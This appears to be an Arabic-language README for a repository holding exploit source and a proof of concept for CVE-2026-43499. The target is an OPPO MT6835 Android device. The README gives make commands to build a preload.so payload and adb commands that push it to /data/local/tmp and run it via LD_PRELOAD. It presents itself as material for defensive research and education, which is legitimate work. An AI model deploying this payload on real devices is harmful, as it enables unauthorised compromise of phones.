
مصدر الاستغلال وإثبات المفهوم (PoC) لـ CVE-2026-43499 الذي يستهدف جهاز أندرويد OPPO MT6835، بما في ذلك حمولة التحميل المسبق، ونصوص البناء، وملاحظات التحليل لأغراض البحث الدفاعي والتعليم.
يحتوي هذا المستودع على لقطة بحثية مدمجة لسلسلة استغلال بأسلوب GhostLock تستهدف جهازاً يعتمد على OPPO MT6835.
من جذر المستودع:
cd exploit
make PROJECT=oppo-PLS120-BP2A.250605.015
بعد بناء حمولة preload، ادفعها إلى جهاز اختبار وقم بتشغيلها في بيئة مختبرية خاضعة للتحكم:
adb push exploit/build/oppo-PLS120-BP2A.250605.015/bin/preload.so /data/local/tmp/
adb shell chmod 755 /data/local/tmp/preload.so
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
.
├── boot/ # trimmed analysis artifacts
├── exploit/ # exploit source and build output
├── poc/ # minimal PoC entry point
├── tools/ # auxiliary analysis scripts
└── README.md
استخدم فقط على الأجهزة والأنظمة المصرَّح لك باختبارها. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام.